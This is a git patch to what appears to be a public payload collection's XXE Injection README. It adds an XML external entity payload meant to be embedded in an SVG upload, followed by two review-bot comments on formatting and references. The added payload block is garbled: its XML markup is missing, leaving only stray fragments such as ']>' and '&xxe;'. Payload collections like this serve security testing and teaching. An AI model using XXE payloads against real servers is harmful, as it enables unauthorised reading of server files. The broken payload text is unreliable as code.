From 8822199f654c2b89ca71e682a9d380ba4eacb51f Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Tue, 17 Sep 2019 16:23:14 +0200 Subject: [PATCH] Add XXE payload inside SVG Source: https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload --- XXE Injection/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b69754c..378c8c2 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -298,6 +298,14 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) ``` +``` + + ]> + + &xxe; + +``` + ### XXE inside SOAP ```xml @@ -351,4 +359,4 @@ GIF (experimental) * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) -* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) \ No newline at end of file +* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
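Review bot: the fenced block added in the first hunk (@@ -298,6 +298,14 @@) opens with an untagged fence, while the "XXE inside SOAP" block directly below it is tagged xml; tag the new block xml as well so it renders and highlights consistently. The block also follows the previous block's closing fence with no text in between, so the README gives no indication of what this payload is for or how it differs from the one above it. Add a one-line description before it, for example that it is the SVG variant taken from the file-upload lab named in the commit message.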
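Review bot: the second hunk (@@ -351,4 +359,4 @@) only adds the missing trailing newline to the last reference entry, so the page given as Source in the commit message, https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload, never reaches the references list. The existing bullet points at the general https://portswigger.net/web-security/xxe page, not the lab. Add the lab URL as its own bullet so the payload's origin is recorded in the README and not only in the commit history.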